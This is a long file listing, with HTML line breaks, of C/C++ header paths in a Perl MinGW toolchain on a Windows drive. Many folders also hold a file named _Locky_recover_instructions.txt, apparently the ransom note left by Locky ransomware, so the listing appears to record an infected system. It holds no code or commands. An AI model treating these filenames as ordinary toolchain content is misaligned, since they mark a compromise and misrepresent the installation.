c:\Perl\c\i686-w64-mingw32\include\xmldomdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmldsodid.h<br />
c:\Perl\c\i686-w64-mingw32\include\xmltrnsf.h<br />
c:\Perl\c\i686-w64-mingw32\include\xolehlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ymath.h<br />
c:\Perl\c\i686-w64-mingw32\include\yvals.h<br />
c:\Perl\c\i686-w64-mingw32\include\zmouse.h<br />
c:\Perl\c\i686-w64-mingw32\include\_dbdao.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_dxhelper.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_float.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_mac.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_print_pop.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_print_push.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_stdarg.h<br />
c:\Perl\c\include\c++\4.4.3\backward\auto_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\backward\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\backward\backward_warning.h<br />
c:\Perl\c\include\c++\4.4.3\backward\binders.h<br />
c:\Perl\c\include\c++\4.4.3\backward\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\backward\hash_fun.h<br />
c:\Perl\c\include\c++\4.4.3\bits\algorithmfwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\bits\allocator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomicfwd_c.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomicfwd_cxx.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomic_0.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomic_2.h<br />
c:\Perl\c\include\c++\4.4.3\bits\basic_ios.h<br />
c:\Perl\c\include\c++\4.4.3\bits\basic_string.h<br />
c:\Perl\c\include\c++\4.4.3\bits\boost_concept_check.h<br />
c:\Perl\c\include\c++\4.4.3\bits\char_traits.h<br />
c:\Perl\c\include\c++\4.4.3\bits\codecvt.h<br />
c:\Perl\c\include\c++\4.4.3\bits\concept_check.h<br />
c:\Perl\c\include\c++\4.4.3\bits\cpp_type_traits.h<br />
c:\Perl\c\include\c++\4.4.3\bits\forward_list.h<br />
c:\Perl\c\include\c++\4.4.3\bits\functexcept.h<br />
c:\Perl\c\include\c++\4.4.3\bits\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\bits\gslice.h<br />
c:\Perl\c\include\c++\4.4.3\bits\gslice_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\bits\indirect_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\ios_base.h<br />
c:\Perl\c\include\c++\4.4.3\bits\localefwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_classes.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_facets.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_facets_nonio.h<br />
c:\Perl\c\include\c++\4.4.3\bits\mask_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\move.h<br />
c:\Perl\c\include\c++\4.4.3\bits\ostream_insert.h<br />
c:\Perl\c\include\c++\4.4.3\bits\postypes.h<br />
c:\Perl\c\include\c++\4.4.3\bits\shared_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\bits\slice_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_algo.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_algobase.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_bvector.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_construct.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_deque.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_function.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_heap.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator_base_funcs.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator_base_types.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_list.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_map.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_multimap.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_multiset.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_numeric.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_pair.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_queue.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_raw_storage_iter.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_relops.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_set.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_stack.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_tempbuf.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_tree.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_uninitialized.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_vector.h<br />
c:\Perl\c\include\c++\4.4.3\bits\streambuf_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stream_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stringfwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\unique_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_after.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_before.h<br />
c:\Perl\c\include\c++\4.4.3\c++0x_warning.h<br />
c:\Perl\c\include\c++\4.4.3\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\complex.h<br />
c:\Perl\c\include\c++\4.4.3\cxxabi-forced.h<br />
c:\Perl\c\include\c++\4.4.3\cxxabi.h<br />
c:\Perl\c\include\c++\4.4.3\debug\debug.h<br />
c:\Perl\c\include\c++\4.4.3\debug\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\debug\formatter.h<br />
c:\Perl\c\include\c++\4.4.3\debug\functions.h<br />
c:\Perl\c\include\c++\4.4.3\debug\macros.h<br />
c:\Perl\c\include\c++\4.4.3\debug\map.h<br />
c:\Perl\c\include\c++\4.4.3\debug\multimap.h<br />
c:\Perl\c\include\c++\4.4.3\debug\multiset.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_base.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_sequence.h<br />
c:\Perl\c\include\c++\4.4.3\debug\set.h<br />
c:\Perl\c\include\c++\4.4.3\exception_defines.h<br />
c:\Perl\c\include\c++\4.4.3\exception_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\ext\array_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\ext\atomicity.h<br />
c:\Perl\c\include\c++\4.4.3\ext\bitmap_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\cast.h<br />
c:\Perl\c\include\c++\4.4.3\ext\codecvt_specializations.h<br />
c:\Perl\c\include\c++\4.4.3\ext\concurrence.h<br />
c:\Perl\c\include\c++\4.4.3\ext\debug_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\enc_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\extptr_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\malloc_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\mt_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\new_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\numeric_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pod_char_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pointer.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pool_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\rc_string_base.h<br />
c:\Perl\c\include\c++\4.4.3\ext\ropeimpl.h<br />
c:\Perl\c\include\c++\4.4.3\ext\sso_string_base.h<br />
c:\Perl\c\include\c++\4.4.3\ext\stdio_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\stdio_sync_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\string_conversions.h<br />
c:\Perl\c\include\c++\4.4.3\ext\throw_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\typelist.h<br />
c:\Perl\c\include\c++\4.4.3\ext\type_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring_fwd.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring_util.h<br />
c:\Perl\c\include\c++\4.4.3\fenv.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\atomic_word.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\basic_file.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++allocator.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++config.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++io.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++locale.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\cpu_defines.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_base.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_inline.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_noninline.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\cxxabi_tweaks.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\error_constants.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\extc++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-default.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-posix.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-single.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-tpf.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\messages_members.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\os_defines.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\stdc++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\stdtr1c++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\time_members.h<br />
c:\Perl\c\include\c++\4.4.3\stdatomic.h<br />
c:\Perl\c\include\c++\4.4.3\tgmath.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\complex.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\tr1\ctype.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\fenv.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\float.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\inttypes.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\limits.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\math.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\shared_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\special_function_util.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdarg.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdbool.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdint.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdio.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdlib.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\tgmath.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\wchar.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\wctype.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\boost_sp_counted_base.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\hashtable_policy.h<br />
c:\Perl\c\include\db.h<br />
c:\Perl\c\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\dbm.h<br />
c:\Perl\c\include\db_cxx.h<br />
c:\Perl\c\include\entities.h<br />
c:\Perl\c\include\expat.h<br />
c:\Perl\c\include\expat_external.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftconfig.h<br />
c:\Perl\c\include\freetype2\freetype\config\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\freetype2\freetype\config\ftheader.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftmodule.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftoption.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftstdlib.h<br />
c:\Perl\c\include\freetype2\freetype\freetype.h<br />
c:\Perl\c\include\freetype2\freetype\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\freetype2\freetype\ftadvanc.h<br />
c:\Perl\c\include\freetype2\freetype\ftbbox.h<br />
c:\Perl\c\include\freetype2\freetype\ftbdf.h<br />
c:\Perl\c\include\freetype2\freetype\ftbitmap.h<br />
c:\Perl\c\include\freetype2\freetype\ftcache.h<br />
c:\Perl\c\include\freetype2\freetype\ftchapters.h<br />
c:\Perl\c\include\freetype2\freetype\ftcid.h<br />
c:\Perl\c\include\freetype2\freetype\fterrdef.h<br />
c:\Perl\c\include\freetype2\freetype\fterrors.h<br />
c:\Perl\c\include\freetype2\freetype\ftgasp.h<br />
c:\Perl\c\include\freetype2\freetype\ftglyph.h<br />
c:\Perl\c\include\freetype2\freetype\ftgxval.h<br />
c:\Perl\c\include\freetype2\freetype\ftgzip.h<br />
c:\Perl\c\include\freetype2\freetype\ftimage.h<br />
c:\Perl\c\include\freetype2\freetype\ftincrem.h<br />
c:\Perl\c\include\freetype2\freetype\ftlcdfil.h<br />
c:\Perl\c\include\freetype2\freetype\ftlist.h<br />
c:\Perl\c\include\freetype2\freetype\ftlzw.h<br />
c:\Perl\c\include\freetype2\freetype\ftmac.h<br />
c:\Perl\c\include\freetype2\freetype\ftmm.h<br />
c:\Perl\c\include\freetype2\freetype\ftmodapi.h<br />
c:\Perl\c\include\freetype2\freetype\ftmoderr.h<br />
c:\Perl\c\include\freetype2\freetype\ftotval.h<br />
c:\Perl\c\include\freetype2\freetype\ftoutln.h<br />
c:\Perl\c\include\freetype2\freetype\ftpfr.h<br />
c:\Perl\c\include\freetype2\freetype\ftrender.h<br />
c:\Perl\c\include\freetype2\freetype\ftsizes.h<br />
c:\Perl\c\include\freetype2\freetype\ftsnames.h<br />
c:\Perl\c\include\freetype2\freetype\ftstroke.h<br />
c:\Perl\c\include\freetype2\freetype\ftsynth.h<br />
c:\Perl\c\include\freetype2\freetype\ftsystem.h<br />
c:\Perl\c\include\freetype2\freetype\fttrigon.h<br />
c:\Perl\c\include\freetype2\freetype\fttypes.h<br />
c:\Perl\c\include\freetype2\freetype\ftwinfnt.h<br />
c:\Perl\c\include\freetype2\freetype\ftxf86.h<br />
c:\Perl\c\include\freetype2\freetype\t1tables.h<br />
c:\Perl\c\include\freetype2\freetype\ttnameid.h<br />
c:\Perl\c\include\freetype2\freetype\tttables.h<br />
c:\Perl\c\include\freetype2\freetype\tttags.h<br />
c:\Perl\c\include\freetype2\freetype\ttunpat.h<br />
c:\Perl\c\include\ft2build.h<br />
c:\Perl\c\include\gd.h<br />
c:\Perl\c\include\gdbm.h<br />
c:\Perl\c\include\gdcache.h<br />
c:\Perl\c\include\gdfontg.h<br />
c:\Perl\c\include\gdfontl.h<br />
c:\Perl\c\include\gdfontmb.h<br />
c:\Perl\c\include\gdfonts.h<br />
c:\Perl\c\include\gdfontt.h<br />
c:\Perl\c\include\gdfx.h<br />
c:\Perl\c\include\gd_io.h<br />
c:\Perl\c\include\gif_lib.h<br />
c:\Perl\c\include\GL\freeglut.h<br />
c:\Perl\c\include\GL\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\GL\freeglut_ext.h<br />
c:\Perl\c\include\GL\freeglut_std.h<br />
c:\Perl\c\include\GL\glut.h<br />
c:\Perl\c\include\gmp.h<br />
c:\Perl\c\include\iconv.h<br />
c:\Perl\c\include\jconfig.h<br />
c:\Perl\c\include\jerror.h<br />
c:\Perl\c\include\jmorecfg.h<br />
c:\Perl\c\include\jpeglib.h<br />
c:\Perl\c\include\libcharset.h<br />
c:\Perl\c\include\libexslt\exslt.h<br />
c:\Perl\c\include\libexslt\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libexslt\exsltconfig.h<br />
c:\Perl\c\include\libexslt\exsltexports.h<br />
c:\Perl\c\include\libpng12\png.h<br />
c:\Perl\c\include\libpng12\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libpng12\pngconf.h<br />
c:\Perl\c\include\libpq-events.h<br />
c:\Perl\c\include\libpq-fe.h<br />
c:\Perl\c\include\libssh2.h<br />
c:\Perl\c\include\libssh2_publickey.h<br />
c:\Perl\c\include\libssh2_sftp.h<br />
c:\Perl\c\include\libxml\c14n.h<br />
c:\Perl\c\include\libxml\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libxml\catalog.h<br />
c:\Perl\c\include\libxml\chvalid.h<br />
c:\Perl\c\include\libxml\debugXML.h<br />
c:\Perl\c\include\libxml\dict.h<br />
c:\Perl\c\include\libxml\DOCBparser.h<br />
c:\Perl\c\include\libxml\encoding.h<br />
c:\Perl\c\include\libxml\entities.h<br />
c:\Perl\c\include\libxml\globals.h<br />
c:\Perl\c\include\libxml\hash.h<br />
c:\Perl\c\include\libxml\HTMLparser.h<br />
c:\Perl\c\include\libxml\HTMLtree.h<br />
c:\Perl\c\include\libxml\list.h<br />
c:\Perl\c\include\libxml\nanoftp.h<br />
c:\Perl\c\include\libxml\nanohttp.h<br />
c:\Perl\c\include\libxml\parser.h<br />
c:\Perl\c\include\libxml\parserInternals.h<br />
c:\Perl\c\include\libxml\pattern.h<br />
c:\Perl\c\include\libxml\relaxng.h<br />
c:\Perl\c\include\libxml\SAX.h<br />
c:\Perl\c\include\libxml\SAX2.h<br />
c:\Perl\c\include\libxml\schemasInternals.h<br />
c:\Perl\c\include\libxml\schematron.h<br />
c:\Perl\c\include\libxml\threads.h<br />
c:\Perl\c\include\libxml\tree.h<br />
c:\Perl\c\include\libxml\uri.h<br />
c:\Perl\c\include\libxml\valid.h<br />
c:\Perl\c\include\libxml\xinclude.h<br />
c:\Perl\c\include\libxml\xlink.h<br />
c:\Perl\c\include\libxml\xmlautomata.h<br />
c:\Perl\c\include\libxml\xmlerror.h<br />
c:\Perl\c\include\libxml\xmlexports.h<br />
c:\Perl\c\include\libxml\xmlIO.h<br />
c:\Perl\c\include\libxml\xmlmemory.h<br />
c:\Perl\c\include\libxml\xmlmodule.h<br />
c:\Perl\c\include\libxml\xmlreader.h<br />
c:\Perl\c\include\libxml\xmlregexp.h<br />
c:\Perl\c\include\libxml\xmlsave.h<br />
c:\Perl\c\include\libxml\xmlschemas.h<br />
c:\Perl\c\include\libxml\xmlschemastypes.h<br />
c:\Perl\c\include\libxml\xmlstring.h<br />
c:\Perl\c\include\libxml\xmlunicode.h<br />
c:\Perl\c\include\libxml\xmlversion.h<br />
c:\Perl\c\include\libxml\xmlwriter.h<br />
c:\Perl\c\include\libxml\xpath.h<br />
c:\Perl\c\include\libxml\xpathInternals.h<br />
c:\Perl\c\include\libxml\xpointer.h<br />
c:\Perl\c\include\libxslt\attributes.h<br />
c:\Perl\c\include\libxslt\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libxslt\documents.h<br />
c:\Perl\c\include\libxslt\extensions.h<br />
c:\Perl\c\include\libxslt\extra.h<br />
c:\Perl\c\include\libxslt\functions.h<br />
c:\Perl\c\include\libxslt\imports.h<br />
c:\Perl\c\include\libxslt\keys.h<br />
c:\Perl\c\include\libxslt\namespaces.h<br />
c:\Perl\c\include\libxslt\numbersInternals.h<br />
c:\Perl\c\include\libxslt\pattern.h<br />
c:\Perl\c\include\libxslt\preproc.h<br />
c:\Perl\c\include\libxslt\security.h<br />
c:\Perl\c\include\libxslt\templates.h<br />
c:\Perl\c\include\libxslt\transform.h<br />
c:\Perl\c\include\libxslt\variables.h<br />
c:\Perl\c\include\libxslt\xslt.h<br />
c:\Perl\c\include\libxslt\xsltconfig.h<br />
c:\Perl\c\include\libxslt\xsltexports.h<br />
c:\Perl\c\include\libxslt\xsltInternals.h<br />
c:\Perl\c\include\libxslt\xsltlocale.h<br />
c:\Perl\c\include\libxslt\xsltutils.h<br />
c:\Perl\c\include\localcharset.h<br />
c:\Perl\c\include\lzma\base.h<br />
c:\Perl\c\include\lzma\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\lzma\bcj.h<br />
c:\Perl\c\include\lzma\block.h<br />
c:\Perl\c\include\lzma\check.h<br />
c:\Perl\c\include\lzma\container.h<br />
c:\Perl\c\include\lzma\delta.h<br />
c:\Perl\c\include\lzma\filter.h<br />
c:\Perl\c\include\lzma\index.h<br />
c:\Perl\c\include\lzma\index_hash.h<br />
c:\Perl\c\include\lzma\lzma.h<br />
c:\Perl\c\include\lzma\stream_flags.h<br />
c:\Perl\c\include\lzma\subblock.h<br />
c:\Perl\c\include\lzma\version.h<br />
c:\Perl\c\include\lzma\vli.h<br />
c:\Perl\c\include\lzma.h<br />
c:\Perl\c\include\mpc.h<br />
c:\Perl\c\include\mpf2mpfr.h<br />
c:\Perl\c\include\mpfr.h<br />
c:\Perl\c\include\mysql_5\config-win.h<br />
c:\Perl\c\include\mysql_5\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\mysql_5\decimal.h<br />
c:\Perl\c\include\mysql_5\errmsg.h<br />
c:\Perl\c\include\mysql_5\keycache.h<br />
c:\Perl\c\include\mysql_5\mysql\plugin.h<br />
c:\Perl\c\include\mysql_5\mysql\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\mysql_5\mysql.h<br />
c:\Perl\c\include\mysql_5\mysqld_ername.h<br />
c:\Perl\c\include\mysql_5\mysqld_error.h<br />
c:\Perl\c\include\mysql_5\mysql_com.h<br />
c:\Perl\c\include\mysql_5\mysql_embed.h<br />
c:\Perl\c\include\mysql_5\mysql_time.h<br />
c:\Perl\c\include\mysql_5\mysql_version.h<br />
c:\Perl\c\include\mysql_5\my_alloc.h<br />
c:\Perl\c\include\mysql_5\my_attribute.h<br />
c:\Perl\c\include\mysql_5\my_dbug.h<br />
c:\Perl\c\include\mysql_5\my_dir.h<br />
c:\Perl\c\include\mysql_5\my_getopt.h<br />
c:\Perl\c\include\mysql_5\my_global.h<br />
c:\Perl\c\include\mysql_5\my_list.h<br />
c:\Perl\c\include\mysql_5\my_net.h<br />
c:\Perl\c\include\mysql_5\my_no_pthread.h<br />
c:\Perl\c\include\mysql_5\my_pthread.h<br />
c:\Perl\c\include\mysql_5\my_sys.h<br />
c:\Perl\c\include\mysql_5\my_xml.h<br />
c:\Perl\c\include\mysql_5\m_ctype.h<br />
c:\Perl\c\include\mysql_5\m_string.h<br />
c:\Perl\c\include\mysql_5\sql_common.h<br />
c:\Perl\c\include\mysql_5\sql_state.h<br />
c:\Perl\c\include\mysql_5\sslopt-case.h<br />
c:\Perl\c\include\mysql_5\sslopt-longopts.h<br />
c:\Perl\c\include\mysql_5\sslopt-vars.h<br />
c:\Perl\c\include\mysql_5\typelib.h<br />
c:\Perl\c\include\ndbm.h<br />
c:\Perl\c\include\openssl\aes.h<br />
c:\Perl\c\include\openssl\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\openssl\asn1.h<br />
c:\Perl\c\include\openssl\asn1t.h<br />
c:\Perl\c\include\openssl\asn1_mac.h<br />
c:\Perl\c\include\openssl\bio.h<br />
c:\Perl\c\include\openssl\blowfish.h<br />
c:\Perl\c\include\openssl\bn.h<br />
c:\Perl\c\include\openssl\buffer.h<br />
c:\Perl\c\include\openssl\cast.h<br />
c:\Perl\c\include\openssl\comp.h<br />
c:\Perl\c\include\openssl\conf.h<br />
c:\Perl\c\include\openssl\conf_api.h<br />
c:\Perl\c\include\openssl\crypto.h<br />
c:\Perl\c\include\openssl\des.h<br />
c:\Perl\c\include\openssl\des_old.h<br />
c:\Perl\c\include\openssl\dh.h<br />
c:\Perl\c\include\openssl\dsa.h<br />
c:\Perl\c\include\openssl\dso.h<br />
c:\Perl\c\include\openssl\dtls1.h<br />
c:\Perl\c\include\openssl\ebcdic.h<br />
c:\Perl\c\include\openssl\ec.h<br />
c:\Perl\c\include\openssl\ecdh.h<br />
c:\Perl\c\include\openssl\ecdsa.h<br />
c:\Perl\c\include\openssl\engine.h<br />
c:\Perl\c\include\openssl\err.h<br />
c:\Perl\c\include\openssl\evp.h<br />
c:\Perl\c\include\openssl\e_os2.h<br />
c:\Perl\c\include\openssl\hmac.h<br />
c:\Perl\c\include\openssl\idea.h<br />
c:\Perl\c\include\openssl\krb5_asn.h<br />
c:\Perl\c\include\openssl\kssl.h<br />
c:\Perl\c\include\openssl\lhash.h<br />
c:\Perl\c\include\openssl\md2.h<br />
c:\Perl\c\include\openssl\md4.h<br />
c:\Perl\c\include\openssl\md5.h<br />
c:\Perl\c\include\openssl\objects.h<br />
c:\Perl\c\include\openssl\obj_mac.h<br />
c:\Perl\c\include\openssl\ocsp.h<br />
c:\Perl\c\include\openssl\opensslconf.h<br />
c:\Perl\c\include\openssl\opensslv.h<br />
c:\Perl\c\include\openssl\ossl_typ.h<br />
c:\Perl\c\include\openssl\pem.h<br />
c:\Perl\c\include\openssl\pem2.h<br />
c:\Perl\c\include\openssl\pkcs12.h<br />
c:\Perl\c\include\openssl\pkcs7.h<br />
c:\Perl\c\include\openssl\pqueue.h<br />
c:\Perl\c\include\openssl\pq_compat.h<br />
c:\Perl\c\include\openssl\rand.h<br />
c:\Perl\c\include\openssl\rc2.h<br />
c:\Perl\c\include\openssl\rc4.h<br />
c:\Perl\c\include\openssl\ripemd.h<br />
c:\Perl\c\include\openssl\rsa.h<br />
c:\Perl\c\include\openssl\safestack.h<br />
c:\Perl\c\include\openssl\sha.h<br />
c:\Perl\c\include\openssl\ssl.h<br />
c:\Perl\c\include\openssl\ssl2.h<br />
c:\Perl\c\include\openssl\ssl23.h<br />
c:\Perl\c\include\openssl\ssl3.h<br />
c:\Perl\c\include\openssl\stack.h<br />
c:\Perl\c\include\openssl\store.h<br />
c:\Perl\c\include\openssl\symhacks.h<br />
c:\Perl\c\include\openssl\tls1.h<br />
c:\Perl\c\include\openssl\tmdiff.h<br />
c:\Perl\c\include\openssl\txt_db.h<br />
c:\Perl\c\include\openssl\ui.h<br />
c:\Perl\c\include\openssl\ui_compat.h<br />
c:\Perl\c\include\openssl\x509.h<br />
c:\Perl\c\include\openssl\x509v3.h<br />
c:\Perl\c\include\openssl\x509_vfy.h<br />
c:\Perl\c\include\png.h<br />
c:\Perl\c\include\pngconf.h<br />
c:\Perl\c\include\postgres_ext.h<br />
c:\Perl\c\include\tiff.h<br />
c:\Perl\c\include\tiffconf.h<br />
c:\Perl\c\include\tiffio.h<br />
c:\Perl\c\include\tiffvers.h<br />
c:\Perl\c\include\X11\simx.h<br />
c:\Perl\c\include\X11\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\X11\xpm.h<br />
c:\Perl\c\include\zconf.h<br />
c:\Perl\c\include\zlib.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ammintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\avxintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\bmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\cpuid.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\cross-stdarg.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\emmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\immintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\iso646.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mm3dnow.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mmintrin-common.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mm_malloc.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\nmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\pmmintrin.h<br />
